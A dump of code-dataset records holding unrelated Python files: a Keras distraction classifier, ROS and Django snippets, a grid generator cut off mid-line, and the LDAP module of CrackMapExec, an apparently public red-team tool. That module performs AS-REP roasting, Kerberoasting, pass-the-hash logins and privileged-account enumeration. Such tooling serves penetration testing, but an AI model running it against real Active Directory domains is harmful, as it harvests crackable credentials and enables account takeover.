","repo_name":"saloni-080601/list.py","sub_path":"karuna.py","file_name":"karuna.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19124926702","text":"import numpy as np\nimport cv2\nimport os\nimport sys\nimport keras\nfrom keras.applications.mobilenet import MobileNet\nfrom keras.models import Model, Sequential, load_model\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import ModelCheckpoint\nimport keras.layers as L\nfrom keras.optimizers import SGD, Adam\nfrom os.path import join\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import OneHotEncoder, LabelBinarizer\nimport matplotlib.pyplot as plt\nimport sys\n\ntemperature = 10\n\ndef pretrained_small():\n model = MobileNet(input_shape=(128, 128, 3), alpha=1.0, depth_multiplier=1, dropout=1e-3, include_top=False, weights='imagenet', input_tensor=None, pooling=None, classes=8)\n layer_name = 'conv_pw_6'\n intermodel = Model(inputs=model.input, outputs=model.get_layer(layer_name).output)\n return intermodel\n\ndef shuffle_in_unison_scary(X, Y1, Y2):\n rng_state = np.random.get_state()\n np.random.shuffle(X)\n np.random.set_state(rng_state)\n np.random.shuffle(Y1)\n np.random.set_state(rng_state)\n np.random.shuffle(Y2)\n return X, Y1, Y2\n\ndef getdata():\n num_images=3105\n X = np.zeros((num_images, 128, 128, 3))\n Y1 = np.zeros((num_images,), dtype=int)\n Y2 = np.zeros((num_images,), dtype=int)\n mydir1 = 'finaldata/paths/'\n mydir2 = 'finaldata/'\n counter=0\n summ=0\n for labelfile in os.listdir(mydir1):\n print(labelfile)\n fullpath = join(mydir1, labelfile)\n data = pd.read_csv(fullpath)\n length = len(data)\n for i in range(length):\n imgname = str(data[\"filepath\"][i])\n if imgname == 'nan': continue\n imgname = imgname[2:]\n direction = data['direction'][i]\n distracted = data['distracted'][i]\n imagepath=join(mydir2, imgname)\n img = cv2.imread(imagepath)\n img = cv2.resize(img, (128, 128))\n X[counter, :, :, :] = img[:, :, :]\n Y1[counter] = int(direction)\n Y2[counter] = int(distracted)\n counter+=1\n print(\"done\")\n print(counter)\n X -= 128\n X /= 128\n enc=LabelBinarizer()\n Y1=enc.fit_transform(Y1.reshape(Y1.shape[0], 1))\n Y2=enc.fit_transform(Y2.reshape(Y2.shape[0], 1))\n np.save('distractiondata/X.npy', X)\n np.save('distractiondata/Y1.npy', Y1)\n np.save('distractiondata/Y2.npy', Y2)\n return\n\ndef getsaveddata():\n X = np.load('distractiondata/X.npy')\n Y1 = np.load('distractiondata/Y1.npy')\n Y2 = np.load('distractiondata/Y2.npy')\n return X, Y1, Y2\n\ndef trainRealTransfer2_withoutgen():\n batchsize = 64\n X, Y1, Y2= getsaveddata()\n X, Y1, Y2= shuffle_in_unison_scary(X, Y1, Y2)\n intermodel = pretrained_small()\n print(Y2.shape)\n x = intermodel.output\n x = L.Conv2D(filters=512, kernel_size=(3, 3), strides=(1, 1), padding='same', activation='relu')(x)\n x = L.Conv2D(filters=512, kernel_size=(3, 3), strides=(1, 1), padding='same', activation='relu')(x)\n x = L.Conv2D(filters=512, kernel_size=(3, 3), strides=(2, 2), padding='same', activation='relu')(x)\n x = L.Conv2D(filters=512, kernel_size=(3, 3), strides=(1, 1), padding='same', activation='relu')(x)\n x = L.Flatten()(x)\n x = L.Dense(1024, activation='relu')(x)\n x = L.Dropout(0.5)(x)\n x = L.Dense(512, activation='relu')(x)\n x = L.Dropout(0.5)(x)\n x1 = L.Dense(128, activation='relu')(x)\n x1 = L.Dropout(0.5)(x1)\n x1 = L.Dense(8)(x1)\n x1 = L.Activation('softmax', name='dir_out')(x1)\n x2 = L.Dense(128, activation='elu')(x)\n x2 = L.Dropout(0.5)(x2)\n x2 = L.Dense(1)(x2)\n x2 = L.Activation('sigmoid', name='dis_out')(x2)\n model = Model(inputs = intermodel.input, outputs = [x1, x2])\n filepath=\"models/distraction.h5\"\n loss = {\n 'dir_out':'categorical_crossentropy',\n 'dis_out':'binary_crossentropy'\n }\n model.compile(optimizer=Adam(lr=0.00005, decay=0.001), loss=loss, metrics=['accuracy'])\n checkpoint = ModelCheckpoint(filepath, monitor='val_loss', verbose=1, save_best_only=True, mode='min')\n callback_list = [checkpoint]\n history = model.fit(x=X, y={'dir_out':Y1, 'dis_out':Y2}, batch_size=64, epochs=1, verbose=1, validation_split=0.2, callbacks=callback_list)\n # summarize history for accuracy\n\n\ndef inference_KD():\n model = load_model('models/distraction.h5')\n path = 'test/'\n correct=0\n l = len(os.listdir(path))\n while True:\n imgp = input('imgpath: ')\n img = cv2.imread(imgp)\n img = cv2.resize(img, (128, 128)).astype(np.float32)\n # cv2.imshow('win', img)\n # cv2.waitKey(0)\n img -= 128\n img = img/128\n \n output = model.predict(np.reshape(img, (1, 128, 128, 3)))\n prediction = np.array(output[0]).argmax()\n prediction2 = output[1]\n print('direction:', prediction, 'distraction score:', prediction2[0][0])\n \n\ndef main():\n choice = sys.argv[1]\n if choice == 'train':\n trainRealTransfer2_withoutgen()\n if choice == 'infer':\n inference_KD()\n\nmain()","repo_name":"chiragk156/PedestrianPrediction","sub_path":"train2.py","file_name":"train2.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32409373168","text":"# from https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py\n# https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf\n\nimport requests\nimport logging\nimport configparser\nfrom cme.connection import *\nfrom cme.helpers.logger import highlight\nfrom cme.logger import CMEAdapter\nfrom cme.protocols.ldap.kerberos import KerberosAttacks\nfrom impacket.smbconnection import SMBConnection, SessionError\nfrom impacket.smb import SMB_DIALECT\nfrom impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_DONT_REQUIRE_PREAUTH, UF_TRUSTED_FOR_DELEGATION, UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION\nfrom impacket.krb5.kerberosv5 import sendReceive, KerberosError, getKerberosTGT, getKerberosTGS\nfrom impacket.krb5.types import KerberosTime, Principal\nfrom impacket.ldap import ldap as ldap_impacket\nfrom impacket.krb5 import constants\nfrom impacket.ldap import ldapasn1 as ldapasn1_impacket\nfrom io import StringIO\n\nclass ldap(connection):\n\n def __init__(self, args, db, host):\n self.domain = None\n self.server_os = None\n self.os_arch = 0\n self.hash = None\n self.ldapConnection = None\n self.lmhash = ''\n self.nthash = ''\n self.baseDN = ''\n self.remote_ops = None\n self.bootkey = None\n self.output_filename = None\n self.smbv1 = None\n self.signing = False\n self.smb_share_name = smb_share_name\n\n connection.__init__(self, args, db, host)\n\n @staticmethod\n def proto_args(parser, std_parser, module_parser):\n ldap_parser = parser.add_parser('ldap', help=\"own stuff using ldap\", parents=[std_parser, module_parser])\n ldap_parser.add_argument(\"-H\", '--hash', metavar=\"HASH\", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')\n ldap_parser.add_argument(\"--no-bruteforce\", action='store_true', help='No spray when using file for username and password (user1 => password1, user2 => password2')\n ldap_parser.add_argument(\"--continue-on-success\", action='store_true', help=\"continues authentication attempts even after successes\")\n ldap_parser.add_argument(\"--port\", type=int, choices={389, 636}, default=389, help=\"LDAP port (default: 389)\")\n dgroup = ldap_parser.add_mutually_exclusive_group()\n dgroup.add_argument(\"-d\", metavar=\"DOMAIN\", dest='domain', type=str, default=None, help=\"domain to authenticate to\")\n dgroup.add_argument(\"--local-auth\", action='store_true', help='authenticate locally to each target')\n \n egroup = ldap_parser.add_argument_group(\"Retrevie hash on the remote DC\", \"Options to get hashes from Kerberos\")\n egroup.add_argument(\"--asreproast\", help=\"Get AS_REP response ready to crack with hashcat\")\n egroup.add_argument(\"--kerberoasting\", help='Get TGS ticket ready to crack with hashcat')\n \n vgroup = ldap_parser.add_argument_group(\"Retrieve useful information on the domain\", \"Options to to play with Kerberos\")\n vgroup.add_argument(\"--trusted-for-delegation\", action=\"store_true\", help=\"Get the list of users and computers with flag TRUSTED_FOR_DELEGATION\")\n vgroup.add_argument(\"--admin-count\", action=\"store_true\", help=\"Get objets that had the value adminCount=1\")\n\n return parser\n\n def proto_logger(self):\n self.logger = CMEAdapter(extra={\n 'protocol': 'LDAP',\n 'host': self.host,\n 'port': self.args.port,\n 'hostname': self.hostname\n })\n\n def get_os_arch(self):\n try:\n stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)\n transport = DCERPCTransportFactory(stringBinding)\n transport.set_connect_timeout(5)\n dce = transport.get_dce_rpc()\n if self.args.kerberos:\n dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)\n dce.connect()\n try:\n dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))\n except (DCERPCException, e):\n if str(e).find('syntaxes_not_supported') >= 0:\n dce.disconnect()\n return 32\n else:\n dce.disconnect()\n return 64\n\n except Exception as e:\n logging.debug('Error retrieving os arch of {}: {}'.format(self.host, str(e)))\n\n return 0\n\n def enum_host_info(self):\n self.local_ip = self.conn.getSMBServer().get_socket().getsockname()[0]\n\n try:\n self.conn.login('' , '')\n except:\n #if \"STATUS_ACCESS_DENIED\" in e:\n pass\n\n self.domain = self.conn.getServerDNSDomainName()\n self.hostname = self.conn.getServerName()\n self.server_os = self.conn.getServerOS()\n self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection['RequireSigning']\n self.os_arch = self.get_os_arch()\n\n self.output_filename = os.path.expanduser('~/.cme/logs/{}_{}_{}'.format(self.hostname, self.host, datetime.now().strftime(\"%Y-%m-%d_%H%M%S\")))\n\n if not self.domain:\n self.domain = self.hostname\n\n try:\n '''plaintext_login\n DC's seem to want us to logoff first, windows workstations sometimes reset the connection\n (go home Windows, you're drunk)\n '''\n self.conn.logoff()\n except:\n pass\n\n if self.args.domain:\n self.domain = self.args.domain\n \n if self.args.local_auth:\n self.domain = self.hostname\n\n #Re-connect since we logged off\n self.create_conn_obj()\n\n def print_host_info(self):\n self.logger.info(u\"{}{} (name:{}) (domain:{}) (signing:{}) (SMBv1:{})\".format(self.server_os,\n ' x{}'.format(self.os_arch) if self.os_arch else '',\n self.hostname,\n self.domain,\n self.signing,\n self.smbv1))\n\n def kerberos_login(self, aesKey, kdcHost):\n # Create the baseDN\n domainParts = self.domain.split('.')\n self.baseDN = ''\n for i in domainParts:\n self.baseDN += 'dc=%s,' % i\n # Remove last ','\n self.baseDN = self.baseDN[:-1]\n\n if self.kdcHost is not None:\n target = self.kdcHost\n else:\n target = self.domain\n\n try:\n self.ldapConnection.kerberosLogin(self.username, self.password, self.domain, self.lmhash, self.nthash,\n self.aesKey, kdcHost=self.kdcHost) \n except ldap_impacket.LDAPSessionError as e:\n if str(e).find('strongerAuthRequired') >= 0:\n # We need to try SSL\n self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)\n self.ldapConnection.kerberosLogin(self.username, self.password, self.domain, self.lmhash, self.nthash,\n self.aesKey, kdcHost=self.kdcHost)\n\n return True\n\n\n def plaintext_login(self, domain, username, password):\n self.username = username\n self.password = password\n self.domain = domain\n # Create the baseDN\n self.baseDN = ''\n domainParts = self.domain.split('.')\n for i in domainParts:\n self.baseDN += 'dc=%s,' % i\n # Remove last ','\n self.baseDN = self.baseDN[:-1]\n\n if self.kdcHost is not None:\n target = self.kdcHost\n else:\n target = domain\n\n if self.password == '' and self.args.asreproast:\n hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)\n if hash_TGT:\n self.logger.highlight(u'{}'.format(hash_TGT))\n with open(self.args.asreproast, 'a+') as hash_asreproast:\n hash_asreproast.write(hash_TGT + '\\n')\n return False\n\n # Connect to LDAP\n out = u'{}{}:{}'.format('{}\\\\'.format(domain),\n username,\n password)\n try:\n self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)\n self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)\n self.logger.success(out)\n except ldap_impacket.LDAPSessionError as e:\n if str(e).find('strongerAuthRequired') >= 0:\n # We need to try SSL\n try:\n self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)\n self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)\n self.logger.success(out)\n except ldap_impacket.LDAPSessionError as e:\n self.logger.error(u'{}\\{}:{}'.format(self.domain, \n self.username, \n self.password))\n else:\n self.logger.error(u'{}\\{}:{}'.format(self.domain, \n self.username, \n self.password))\n return False\n\n return True\n\n def hash_login(self, domain, username, ntlm_hash):\n lmhash = ''\n nthash = ''\n\n #This checks to see if we didn't provide the LM Hash\n if ntlm_hash.find(':') != -1:\n lmhash, nthash = ntlm_hash.split(':')\n else:\n nthash = ntlm_hash\n\n self.hash = ntlm_hash\n if lmhash: self.lmhash = lmhash\n if nthash: self.nthash = nthash\n\n self.username = username\n self.domain = domain\n # Create the baseDN\n self.baseDN = ''\n domainParts = self.domain.split('.')\n for i in domainParts:\n self.baseDN += 'dc=%s,' % i\n # Remove last ','\n self.baseDN = self.baseDN[:-1]\n\n if self.kdcHost is not None:\n target = self.kdcHost\n else:\n target = domain\n\n if self.hash == '' and self.args.asreproast:\n hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)\n if hash_TGT:\n self.logger.highlight(u'{}'.format(hash_TGT))\n with open(self.args.asreproast, 'a+') as hash_asreproast:\n hash_asreproast.write(hash_TGT + '\\n')\n return False\n\n # Connect to LDAP\n out = u'{}{}:{}'.format('{}\\\\'.format(domain),\n username,\n nthash)\n try:\n self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)\n self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)\n\n self.logger.success(out)\n except ldap_impacket.LDAPSessionError as e:\n if str(e).find('strongerAuthRequired') >= 0:\n try:\n # We need to try SSL\n self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)\n self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)\n self.logger.success(out)\n except ldap_impacket.LDAPSessionError as e:\n self.logger.error(u'{}\\{}:{}'.format(self.domain, \n self.username, \n self.nthash))\n else:\n self.logger.error(u'{}\\{}:{}'.format(self.domain, \n self.username, \n self.nthash))\n return False\n\n return True\n\n def create_smbv1_conn(self):\n try:\n self.conn = SMBConnection(self.host, self.host, None, 445, preferredDialect=SMB_DIALECT)\n self.smbv1 = True\n except socket.error as e:\n if str(e).find('Connection reset by peer') != -1:\n logging.debug('SMBv1 might be disabled on {}'.format(self.host))\n return False\n except Exception as e:\n logging.debug('Error creating SMBv1 connection to {}: {}'.format(self.host, e))\n return False\n\n return True\n\n def create_smbv3_conn(self):\n try:\n self.conn = SMBConnection(self.host, self.host, None, 445)\n self.smbv1 = False\n except socket.error:\n return False\n except Exception as e:\n logging.debug('Error creating SMBv3 connection to {}: {}'.format(self.host, e))\n return False\n\n return True\n\n def create_conn_obj(self):\n if self.create_smbv1_conn():\n return True\n elif self.create_smbv3_conn():\n return True\n\n return False\n\n def getUnixTime(self, t):\n t -= 116444736000000000\n t /= 10000000\n return t\n\n def asreproast(self):\n if self.password == '' and self.nthash == '' and self.kerberos == False:\n return False\n # Building the search filter\n searchFilter = \"(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)\" \\\n \"(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))\" % \\\n (UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE)\n\n try:\n logging.debug('Search Filter=%s' % searchFilter)\n resp = self.ldapConnection.search(searchFilter=searchFilter,\n attributes=['sAMAccountName',\n 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],\n sizeLimit=999)\n except ldap_impacket.LDAPSearchError as e:\n if e.getErrorString().find('sizeLimitExceeded') >= 0:\n logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')\n # We reached the sizeLimit, process the answers we have already and that's it. Until we implement\n # paged queries\n resp = e.getAnswers()\n pass\n else:\n logging.debug(e)\n return False\n\n answers = []\n logging.debug('Total of records returned %d' % len(resp))\n\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n mustCommit = False\n sAMAccountName = ''\n memberOf = ''\n pwdLastSet = ''\n userAccountControl = 0\n lastLogon = 'N/A'\n try:\n for attribute in item['attributes']:\n if str(attribute['type']) == 'sAMAccountName':\n sAMAccountName = str(attribute['vals'][0])\n mustCommit = True\n elif str(attribute['type']) == 'userAccountControl':\n userAccountControl = \"0x%x\" % int(attribute['vals'][0])\n elif str(attribute['type']) == 'memberOf':\n memberOf = str(attribute['vals'][0])\n elif str(attribute['type']) == 'pwdLastSet':\n if str(attribute['vals'][0]) == '0':\n pwdLastSet = ''\n else:\n pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n elif str(attribute['type']) == 'lastLogon':\n if str(attribute['vals'][0]) == '0':\n lastLogon = ''\n else:\n lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n if mustCommit is True:\n answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])\n except Exception as e:\n logging.debug(\"Exception:\", exc_info=True)\n logging.debug('Skipping item, cannot process due to error %s' % str(e))\n pass\n if len(answers)>0:\n for user in answers:\n hash_TGT = KerberosAttacks(self).getTGT_asroast(user[0])\n self.logger.highlight(u'{}'.format(hash_TGT))\n with open(self.args.asreproast, 'a+') as hash_asreproast:\n hash_asreproast.write(hash_TGT + '\\n')\n return True\n else:\n self.logger.error(\"No entries found!\")\n\n def kerberoasting(self):\n # Building the search filter\n searchFilter = \"(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)\" \\\n \"(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!(objectCategory=computer)))\"\n\n try:\n resp = self.ldapConnection.search(searchFilter=searchFilter,\n attributes=['servicePrincipalName', 'sAMAccountName',\n 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],\n sizeLimit=999)\n except ldap_impacket.LDAPSearchError as e:\n if e.getErrorString().find('sizeLimitExceeded') >= 0:\n logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')\n # We reached the sizeLimit, process the answers we have already and that's it. Until we implement\n # paged queries\n resp = e.getAnswers()\n pass\n else:\n return False\n\n answers = []\n logging.debug('Total of records returned %d' % len(resp))\n\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n mustCommit = False\n sAMAccountName = ''\n memberOf = ''\n SPNs = []\n pwdLastSet = ''\n userAccountControl = 0\n lastLogon = 'N/A'\n delegation = ''\n try:\n for attribute in item['attributes']:\n if str(attribute['type']) == 'sAMAccountName':\n sAMAccountName = str(attribute['vals'][0])\n mustCommit = True\n elif str(attribute['type']) == 'userAccountControl':\n userAccountControl = str(attribute['vals'][0])\n if int(userAccountControl) & UF_TRUSTED_FOR_DELEGATION:\n delegation = 'unconstrained'\n elif int(userAccountControl) & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION:\n delegation = 'constrained'\n elif str(attribute['type']) == 'memberOf':\n memberOf = str(attribute['vals'][0])\n elif str(attribute['type']) == 'pwdLastSet':\n if str(attribute['vals'][0]) == '0':\n pwdLastSet = ''\n else:\n pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n elif str(attribute['type']) == 'lastLogon':\n if str(attribute['vals'][0]) == '0':\n lastLogon = ''\n else:\n lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n elif str(attribute['type']) == 'servicePrincipalName':\n for spn in attribute['vals']:\n SPNs.append(str(spn))\n\n if mustCommit is True:\n if int(userAccountControl) & UF_ACCOUNTDISABLE:\n logging.debug('Bypassing disabled account %s ' % sAMAccountName)\n else:\n for spn in SPNs:\n answers.append([spn, sAMAccountName,memberOf, pwdLastSet, lastLogon, delegation])\n except Exception as e:\n logging.error('Skipping item, cannot process due to error %s' % str(e))\n pass\n\n if len(answers)>0:\n users = dict( (vals[1], vals[0]) for vals in answers)\n TGT = KerberosAttacks(self).getTGT_kerberoasting()\n for user, SPN in users.items():\n try:\n serverName = Principal(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)\n tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.domain,\n self.kdcHost,\n TGT['KDC_REP'], TGT['cipher'],\n TGT['sessionKey'])\n r = KerberosAttacks(self).outputTGS(tgs, oldSessionKey, sessionKey, user, SPN)\n self.logger.highlight(u'{}'.format(r))\n with open(self.args.kerberoasting, 'a+') as hash_kerberoasting:\n hash_kerberoasting.write(r + '\\n')\n except Exception as e:\n logging.debug(\"Exception:\", exc_info=True)\n logging.error('SPN: %s - %s' % (SPN,str(e)))\n else:\n self.logger.error(\"No entries found!\")\n\n def trusted_for_delegation(self):\n # Building the search filter\n searchFilter = \"(userAccountControl:1.2.840.113556.1.4.803:=524288)\"\n try:\n logging.debug('Search Filter=%s' % searchFilter)\n resp = self.ldapConnection.search(searchFilter=searchFilter,\n attributes=['sAMAccountName',\n 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],\n sizeLimit=999)\n except ldap_impacket.LDAPSearchError as e:\n if e.getErrorString().find('sizeLimitExceeded') >= 0:\n logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')\n # We reached the sizeLimit, process the answers we have already and that's it. Until we implement\n # paged queries\n resp = e.getAnswers()\n pass\n else:\n return False\n answers = []\n logging.debug('Total of records returned %d' % len(resp))\n\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n mustCommit = False\n sAMAccountName = ''\n memberOf = ''\n pwdLastSet = ''\n userAccountControl = 0\n lastLogon = 'N/A'\n try:\n for attribute in item['attributes']:\n if str(attribute['type']) == 'sAMAccountName':\n sAMAccountName = str(attribute['vals'][0])\n mustCommit = True\n elif str(attribute['type']) == 'userAccountControl':\n userAccountControl = \"0x%x\" % int(attribute['vals'][0])\n elif str(attribute['type']) == 'memberOf':\n memberOf = str(attribute['vals'][0])\n elif str(attribute['type']) == 'pwdLastSet':\n if str(attribute['vals'][0]) == '0':\n pwdLastSet = ''\n else:\n pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n elif str(attribute['type']) == 'lastLogon':\n if str(attribute['vals'][0]) == '0':\n lastLogon = ''\n else:\n lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n if mustCommit is True:\n answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])\n except Exception as e:\n logging.debug(\"Exception:\", exc_info=True)\n logging.debug('Skipping item, cannot process due to error %s' % str(e))\n pass\n if len(answers)>0:\n logging.debug(answers)\n for value in answers:\n self.logger.highlight(value[0])\n else:\n self.logger.error(\"No entries found!\")\n return\n\n def admin_count(self):\n # Building the search filter\n searchFilter = \"(adminCount=1)\"\n try:\n logging.debug('Search Filter=%s' % searchFilter)\n resp = self.ldapConnection.search(searchFilter=searchFilter,\n attributes=['sAMAccountName',\n 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],\n sizeLimit=999)\n except ldap_impacket.LDAPSearchError as e:\n if e.getErrorString().find('sizeLimitExceeded') >= 0:\n logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')\n # We reached the sizeLimit, process the answers we have already and that's it. Until we implement\n # paged queries\n resp = e.getAnswers()\n pass\n else:\n return False\n answers = []\n logging.debug('Total of records returned %d' % len(resp))\n\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n mustCommit = False\n sAMAccountName = ''\n memberOf = ''\n pwdLastSet = ''\n userAccountControl = 0\n lastLogon = 'N/A'\n try:\n for attribute in item['attributes']:\n if str(attribute['type']) == 'sAMAccountName':\n sAMAccountName = str(attribute['vals'][0])\n mustCommit = True\n elif str(attribute['type']) == 'userAccountControl':\n userAccountControl = \"0x%x\" % int(attribute['vals'][0])\n elif str(attribute['type']) == 'memberOf':\n memberOf = str(attribute['vals'][0])\n elif str(attribute['type']) == 'pwdLastSet':\n if str(attribute['vals'][0]) == '0':\n pwdLastSet = ''\n else:\n pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n elif str(attribute['type']) == 'lastLogon':\n if str(attribute['vals'][0]) == '0':\n lastLogon = ''\n else:\n lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n if mustCommit is True:\n answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])\n except Exception as e:\n logging.debug(\"Exception:\", exc_info=True)\n logging.debug('Skipping item, cannot process due to error %s' % str(e))\n pass\n if len(answers)>0:\n logging.debug(answers)\n for value in answers:\n self.logger.highlight(value[0])\n else:\n self.logger.error(\"No entries found!\")\n return \n\n","repo_name":"ryanmrestivo/red-team","sub_path":"Exploitation-Tools/CrackMapExec/site-packages/cme/protocols/ldap.py","file_name":"ldap.py","file_ext":"py","file_size_in_byte":28725,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"24346878356","text":"'''\nCreated on 15.03.2013\n@author: Jens Seifried\nfor : Floribot ROS_Stage/Real\nDescription: Script to find Objekts in Laserscan \n and publish their cartesian coordinates\n'''\n#!/usr/bin/env python\nimport roslib; \nimport rospy\nimport math\nimport string\nfrom sensor_msgs.msg import LaserScan\nfrom sensor_msgs.msg import PointCloud\nfrom geometry_msgs.msg import Point32\nfrom sensor_msgs.msg import ChannelFloat32\n\n\ndef listener():\n rospy.Subscriber(\"scan\", LaserScan, callback)\n rospy.spin() \n \ndef callback(data):\n #Variablen\n message1 = PointCloud()\n channel = ChannelFloat32()\n channel.values = [] \n #Suchparameter \n search_Range = 4.0\n radius = 0.05\n #Schleifen-Startbedingung\n i_os = i_oe =1\n i=1\n while i < len(data.ranges):\n if data.ranges[i] <= search_Range:\n if abs(data.ranges[i]-data.ranges[i-1])< radius:\n point = Point32()\n i_os = i_oe = i\n count = 1\n stop = 0\n while abs(data.ranges[i_oe]-data.ranges[i_oe-1])< radius and stop == 0:\n count +=1\n if i_oe < len(data.ranges)-1: i_oe+=1\n if i_oe == len(data.ranges)-1: stop = 1\n \n i = i_oe\n count /=2\n if i_os+count < len(data.ranges):\n angle = data.angle_min+(i_os+count)*data.angle_increment\n point.x = math.cos(angle)*data.ranges[i_os+count]#-radius\n point.y = math.sin(angle)*data.ranges[i_os+count]#-radius\n point.z = 0\n if i_os+count > len(data.ranges):\n angle = data.angle_min+(len(data.ranges)-1)*data.angle_increment\n point.x = math.cos(angle)*data.ranges[len(data.ranges)-1]#-radius\n point.y = math.sin(angle)*data.ranges[len(data.ranges)-1]#-radius\n point.z = 0 \n channel.values.append(math.degrees(angle)) \n message1.points.append(point)\n i+=1\n \n message1.header.seq = data.header.seq\n message1.header.stamp = data.header.stamp\n message1.header.frame_id = data.header.frame_id\n channel.name = \"angle in degrees\"\n message1.channels.append(channel) \n \n #print message1.channels[0].values[4]\n #print message1.channels.values[3]\n #print '#######################################################' \n talker(message1) \n\ndef talker(send):\n #p = rospy.Publisher('ObjCloud', PointCloud)\n p.publish(send) \n \n \nif __name__ == '__main__':\n rospy.init_node('ObjektCloud', anonymous=True)\n p = rospy.Publisher('ObjCloud', PointCloud)\n listener()\n #print message\n ","repo_name":"TorstenHeverhagen/de-floribot-software","sub_path":"floribot_navigation/src/ObjCloud.py","file_name":"ObjCloud.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"568491543","text":"# _*_coding :utf-8 _*_\n# @Time :2022/9/11 18:54\n# @File : urls\n# @Project : python_Django\nfrom django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('add/', add),\n path('select/', select),\n path('update/', update),\n path('delete/', delete),\n\n\n]","repo_name":"wufake70/myPython","sub_path":"python_frame/db_001/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9502005753","text":"import sys\nimport random\n#print (sys.argv[:])\ntry:\n\tx_length = int(sys.argv[1])\n\ty_length = int(sys.argv[2])\nexcept:\n\tsys.exit(sys.argv[0]+\": Usage argv1=xlength,argv2=ylength\")\ngrid = []\ndeigma = [ \"O\" for x in range(x_length) ]\n\n#### PUT FIRST RANDOMLY AS SALT AND PEPPER THE OBSTACLES #######\nfor y in range(y_length):\n grid.append(deigma[:])\n for k in range(random.randrange(0,x_length)):\n grid[y][random.randrange(0,x_length)]='X'\n\n#### PUT WALLS AND PACKAGES OF OBSTACLE RANDOMLY ###\n\n#### HORIZONTALLY #####\n\nfor y in range(y_length):\n if(random.uniform(0,1)>0.8):\n deigma = ['X' for x in range(random.randrange(0,x_length)) ]\n start_position = random.randrange(0,x_length) \n for k in range(start_position,start_position+len(deigma)):\n grid[y][k%x_length]='X'\n\n\n#### VERTICALLY #### \n\nfor x in range(x_length):\n if(random.uniform(0,1)>0.8):\n deigma = ['X' for y in range(random.randrange(0,y_length)) ]\n start_position = random.randrange(0,y_length) \n for k in range(start_position,start_position+len(deigma)):\n 